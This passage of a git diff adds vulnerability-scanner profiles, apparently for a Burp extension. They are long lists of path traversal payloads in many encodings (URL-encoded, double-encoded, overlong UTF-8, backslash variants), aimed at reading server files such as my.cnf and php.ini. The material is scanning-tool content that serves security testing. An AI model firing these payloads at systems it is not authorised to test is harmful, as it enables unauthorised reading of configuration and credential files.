"true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,MySQL database server" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-mysql-conf", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/mysql/my.cnf", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-php.ini.bb b/profiles/Linux-php.ini.bb index c9c91e2..9c9198e 100755 --- a/profiles/Linux-php.ini.bb +++ b/profiles/Linux-php.ini.bb @@ -1 +1,950 @@ -[{"Name":"Linux-php.ini","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FI